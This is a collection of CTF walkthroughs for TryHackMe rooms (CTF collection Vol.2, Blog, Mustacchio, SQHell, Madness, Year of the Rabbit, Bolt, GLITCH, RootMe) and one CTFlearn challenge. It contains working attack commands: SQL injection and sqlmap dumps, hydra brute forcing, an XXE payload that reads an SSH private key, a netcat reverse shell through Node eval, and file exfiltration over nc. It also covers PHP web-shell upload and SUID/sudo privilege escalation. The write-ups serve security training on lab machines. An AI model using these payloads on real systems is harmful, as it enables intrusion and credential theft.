TryHackMe solution: CTF collection Vol.2

Link: https://tryhackme.com/room/ctfcollectionvol2

#1 “Easter 1“

Access: http://10.10.200.87/robots.txt

Use Hex to Text to decode the string.

#2 “Easter 2“

Decode the base64 string with Base64 decoder several times, we have the directory:

http://10.10.200.87/DesKel_secret_base/

View page source and we have the flag.

#3 “Easter 3“

Use gobuster and common.txt:

gobuster dir -u http://10.10.221.97/ -w=common.txt

We found:

http://10.10.15.189/login/

View page source.

#4 “Easter 4“

Save the login request into a file named 'r.txt‘ and use sqlmap:

sqlmap -r r.txt --dbms=MySQL --batch --dump

#5 “Easter 5“

We also have username and password:

Login and we have the flag.

#6 “Easter 6“

Look at the Response Header.

#7 “Easter 7“

When using the web, there is a cookie:

Invited=0

Change the value to 1 and resend the request.

#8 “Easter 8“

There is a hint:

So we change User-Agent Header to get the message:

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1

#9 “Easter 9“

We just need to view source of: http://10.10.200.87/ready/

#10 “Easter 10“

Access: http://10.10.221.97/free_sub/

So we add Referer Header to the request:

Referer: tryhackme.com

#11 “ Easter 11“

Change the dinner to ‘egg‘ and submit:

dinner=egg&submit=submit

#12 “ Easter 12“

View page source and we found:

http://10.10.15.189/jquery-9.1.2.js

Decode the string with Hex to Text.

#13 “Easter 13“

#14 “Easter 14“

View page source of the home page, we have:

Use Base64 to File to decode the base64 string to an image, then we have the flag.

#15 “Easter 15“

Each number is one character (some characters are the same number), try to find them and you have the flag.

#16 “Easter 16“

Play game2: http://10.10.221.97/game2/

And we get:

Send request with three parameter:

POST /game2/ HTTP/1.1
Host: 10.10.221.97
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://10.10.221.97
Connection: close
Referer: http://10.10.221.97/game2/
Cookie: Invited=0
Upgrade-Insecure-Requests: 1

button1=button1&button2=button2&button3=button3&submit=submit

#17 “Easter 17“

Still view page source of the home page:

Copy the binary string, add a zero ‘0‘ to the beginning and use Binary to Text Translator to decode the string:

01000101 01100001 01110011 01110100 01100101 01110010 00100000 00110001 00110111 00111010 00100000 01010100 01001000 01001101 01111011 01101010 00110101 01011111 01101010 00110101 01011111 01101011 00110011 01110000 01011111 01100100 00110011 01100011 00110000 01100100 00110011 01111101

#18 ” Easter 18″

Add a Header to the request:

Egg: Yes

#19 “Easter 19“

Use gobuster and common.txt, we found: http://10.10.221.97/small

#20 “Easter 20”

We just need to send a POST request with the username and password:

POST / HTTP/1.1

Host: 10.10.15.189

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 33

Origin: http://10.10.15.189

Connection: close

Referer: http://10.10.15.189/

Cookie: Invited=0

Upgrade-Insecure-Requests: 1



username=DesKel&password=heIsDumb

TryHackMe solution: Blog

Link: https://tryhackme.com/room/blog

#5 “What version of the above CMS was being used?“
#4 “What CMS was Billy using?“

You may need to add this to your /etc/hosts

10.10.32.187	blog.thm

Use nmap to find open ports:

nmap -sCV 10.10.32.187

#3 “Where was user.txt found?“
#2 “user.txt“

Read 2 posts and we found usernames of 2 users: bjoel & kwheel

We will use hydra with rockyou.txt to brute force the password:

hydra -l kwheel -P rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -V

After having the password, we can login to the blog.

We will use Metasploit:

use exploit/multi/http/wp_crop_rce

Set RHOSTS, LHOST, USERNAME, PASSWORD, and run the exploit.

Spawn a TTY shell with:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Find files with SUID:

find / -type f -perm -u=s 2>/dev/null

We found /usr/sbin/checker

ltrace /usr/sbin/checker

It checks a variable named ‘admin‘, so we will set this environment variable to 1.

export admin=1
checker

We just need to use find command.

find / -type f -name user.txt 2>/dev/null

#1 “root.txt“

cat /root/root.txt

TryHackMe solution: Mustacchio

Link: https://tryhackme.com/room/mustacchio

#1 “What is the user flag?“

Enumeration

Scan open port with RustScan:

rustscan -a 10.10.125.220 -- -sCV

Access the web: http://10.10.125.220/

View page source, we found a directory: http://10.10.125.220/custom/js/

Downloads users.bak.

strings users.bak

We have a credential:

admin:1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

Crack the hash with CrackStation.

Go to: http://10.10.125.220:8765/

And login.

Foothold

View page source, we have:

Download file: http://10.10.125.220:8765/auth/dontforget.bak

We know that we will inject XML code into the text box, and the XML have the format as in dontforget.bak.

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>

Then we have:

The hint is:

<!-- Barry, you can now SSH in using your key!-->

So, we will get the key with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>&read;</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>

View page source for better view:

Save the key into a file named barry.

Use JohntheRipper to crack the private key, we will use ssh2john.py.

python3 ssh2john.py barry > barry.hash

Next, we use JohntheRipper and rockyou.txt.

This link tells us how to install and use JohntheRipper.

john-the-ripper -w=rockyou.txt barry.hash

And we found the passphrase of the key.

Connect to ssh with:

chmod 600 barry
ssh -i barry barry@10.10.125.220

We found the flag.

#2 “What is the root flag?“

Privilege Escalation

Find SUID files with:

And we found /home/joe/live_log

strings /home/joe/live_log

This file use tail, so we will create a new tail for this file.

cd /tmp
echo '#!/bin/bash' > tail
echo 'bash -p' >> tail
chmod +x tail
export PATH=/tmp:$PATH
/home/joe/live_log

And we have root shell.

TryHackMe solution: SQHell

Link: https://tryhackme.com/room/sqhell

#1 “Flag 1“

There is a SQL injection vulnerability in the login function, so we can login with:

username:' or 1=1#
password:a

#2 “Flag 2“

Read Terms and Conditions:

We try to add Header “X-Forwarded-For” to the request and send it to server. The request looks like:

GET / HTTP/1.1
Host: 10.10.142.249
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: *

Save the request to a file named r.txt and use sqlmap:

sqlmap -r r.txt --dump --batch

#3 “Flag 3″

Register function does not work, view page source and we see:

There is a function to check if an username existed.

Use sqlmap for to find the flag:

sqlmap -u "http://10.10.174.62/register/user-check?username=a" --dbms=mysql --dump -D sqhell_3 -T flag --batch

#4 “Flag 4″

Request to view information of an user is vulnerable to SQLi:

http://10.10.142.249/user?id=1

Use:

user?id=0 or 1=1--

But there is only one user.

user?id=1 union select null,null,null--

This indicates that there is 3 columns.

When I use:

user?id=0 union select 1,null,null--

The server still return an user, so I think there is another query here.

user?id=0 union select '1 union select null,null,null,null',null,null--

Now we have 4 columns.

Get the flag with:

user?id=0 union select '1 union select null,flag,null,null from flag',null,null--

#5 “Flag 5“

We have a hint.

Hint: Unless displayed on the page the flags are stored in the flag table in the flag column.

So we will try a payload:

/post?id=0+union+select+null,flag,null,null+from+flag#

TryHackMe solution: Madness

Link: https://tryhackme.com/room/madness

#1 “user.txt“

Use nmap to find open ports:

nmap -sCV 10.10.17.203

Access: http://10.10.17.203/

View page source and we see this:

View the image: http://10.10.17.203/thm.jpg but we get:

Download the image, open it with a hex editor.

The signature is not JPG, so we will correct it into.

Export the image and we have the hidden directory.

Access the directory:

View page source and we see a comment.

So I will brute force the request: http://10.10.156.135/th1s_1s_h1dd3n/?secret=1

The secret is between 0 and 99. When we found it (73), we have:

We use the password we found to extract data from the image thm.jpg.

steghide extract -sf thm.jpg

And we found the username.

The hint is “There’s something ROTten about this guys name!“, so we use ROT13 decoder.

And we have the username.

We have one more image which is not noticed by many people.

Use steghide with a blank passphrase.

steghide extract -sf 5iW7kC8.jpg

And now we have the password.

Use the credential we found to connect to ssh.

ssh joker@10.10.226.98

And we found user.txt.

#2 “root.txt“

We find files with SUID bit set.

find / -type f -perm -u=s 2>/dev/null

We will use /bin/screen-4.5.0 to escalate privilege. After researching, I found that we can use this exploit.

Save the exploit in /tmp/pe.sh and run it.

nano /tmp/pe.sh
chmod +x /tmp/pe.sh
/tmp/pe.sh

And we have the flag.

TryHackMe solution: Year of the Rabbit

Link: https://tryhackme.com/room/yearoftherabbit

#1 “What is the user flag?“

Use nmap to find open ports:

nmap -sCV 10.10.202.82

Next, use dirsearch:

python3 dirsearch.py -u 10.10.202.82

And we found /assets/:

Access: /assets/style.css

Access: /sup3r_s3cr3t_fl4g.php

Turn off javascript and intercept the response of: 10.10.202.82/sup3r_s3cr3t_fl4g.php

We have a directory in Location Header.

Access this folder.

Download the image and use:

strings Hot_Babe.png

Save the passwords to a file named “ftp_passwords.txt” and use hydra to find the password.

hydra -l ftpuser -P ftp_passwords.txt 10.10.202.82 ftp

Connect to ftp:

ftp 10.10.202.82

We get a text file.

Open this file.

Decode with Brainfuck decoder and we have a credential. Use this to connect to ssh.

ssh eli@10.10.202.82

And we have a message.

Let’s find that place.

find / -name "*s3cr3t*" 2>/dev/null

Go to the directory and read the file inside it.

And we have the password of the second user – Gwendoline.

And we found the user’s flag.

#2 “What is the root flag?“

Use “sudo -l” to see what we can do and we can use vi as !root.

We can get root with:

sudo -u#-1 vi /home/gwendoline/user.txt
:!/bin/sh

And we can get the flag in /root.

This vulnerability is CVE-2019-14287.

TryHackMe solution: Bolt

Link: https://tryhackme.com/room/bolt

#1 “What port number has a web server with a CMS running?“

Use:

nmap -sCV 10.10.11.64

to find open ports.

#2 “What is the username we can find in the CMS?“
#3 “What is the password we can find for the username?“

Access the website.

Scroll down and we will find admin’s messages with the username and password we need.

#4 “What version of the CMS is installed on the server? (Ex: Name 1.1.1)“

We can go to login page with: http://10.10.11.64:8000/bolt/login

Login with the credential we found. We will get the answer in the Dashboard.

#5 “There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?“

Go to Exploit Database and search for the version we found.

#6 “Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….)“

Start Metasploit and search for the exploit.

search exploit bolt cms

#7 “Look for flag.txt inside the machine.“

Set the options we need (LHOST, LPORT, RHOST, USERNAME, PASSWORD) and start to exploit the machine.

We will get the flag in /home.

CTFlearn solution: Gobustme 👻

Scroll down and we found a poem.

We have Gobuster! and a common wordlist, so we will use gobuster with this wordlist to find the directory.

gobuster dir -u https://gobustme.ctflearn.com/ -w=common.txt

And the flag is hidden in: https://gobustme.ctflearn.com/hide/

Flag: CTFlearn{gh0sbu5t3rs_4ever}

TryHackMe solution: GLITCH

Link: https://tryhackme.com/room/glitch

#1 “What is your access token?“

Use:

nmap -sCV 10.10.108.245

Port 80 is open, so we access: http://10.10.108.245/

View page source we found a link:

Access: http://10.10.108.245/api/access

Decode the token with base64 decoder.

#2 “What is the content of user.txt?“

Use gobuster and common.txt.

gobuster -u http://10.10.108.245/api/ -w common.txt

Access: http://10.10.108.245/api/items

Access this link again but use POST method, we get:

Now, we use Wfuzz and common.txt to find a parameter.

wfuzz -c -z file,common.txt -X POST --hh 45 -u http://10.10.29.82/api/items\?FUZZ\=test

-c : Output with colors
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
–hh N[,N]+ : Hide responses with the specified chars
-u url : Specify a URL for the request.

We found 'cmd', send a POST request: http://10.10.29.82/api/items?cmd=test

‘test‘ is executed in a eval() function. Stand up a netcat listener on port 1234.

nc -lvnp 1234

Create a shell with payload:

cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')

URL encode:

POST http://10.10.29.82/api/items?%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%36%2e%36%33%2e%31%35%38%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%27%29

And we found the flag.

#3 “What is the content of root.txt?“

In /home/user we found a directory named “.firefox“.

Let’s get this directory, on our machine run:

nc -nlvp 1235 > a.tar

On the machine, run:

tar -cf a.tar .firefox/
nc 10.6.63.158 1235 < a.tar

After receiving the file, use:

tar xf a.tar

to extract the file.

Open the credential in our firefox with:

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

Spawn a tty shell with:

python -c 'import pty; pty.spawn("/bin/sh");'

and change to v0id:

su v0id

Use:

find / -perm -u=s -type f 2>/dev/null

We found /usr/local/bin/doas.

Change to root with:

doas -u root /bin/sh

And we have the flag.

TryHackMe solution: RootMe

Link: https://tryhackme.com/room/rrootme

Task 2: Reconnaissance

#1 “Scan the machine, how many ports are open?“
#2 “What version of Apache is running?“
#3 “What service is running on port 22?“

nmap -sCV 10.10.240.224

#4 “Find directories on the web server using the GoBuster tool.“
#5 “What is the hidden directory?“

We can use this common.txt.

gobuster dir -u http://10.10.240.224/ -w common.txt

Task 3: Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Access: http://10.10.240.224/panel/

We try to upload a php-reverse-shell.php to the server (after changing the IP).

But php is not allowed. Rename our shell to php-reverse-shell.phtml and we can upload it now.

#1 “user.txt“

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Trigger our shell with: http://10.10.240.224/uploads/php-reverse-shell.phtml

Find user.txt with:

find -type f -name "user.txt" 2>/dev/null

Task 4: Privilege escalation

#1 “Search for files with SUID permission, which file is weird?“

Use this command:

find / -perm -u=s -type f 2>/dev/null

#2 “Find a form to escalate your privileges.“

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Explanation.

#3 “root.txt“

We found root.txt in /root.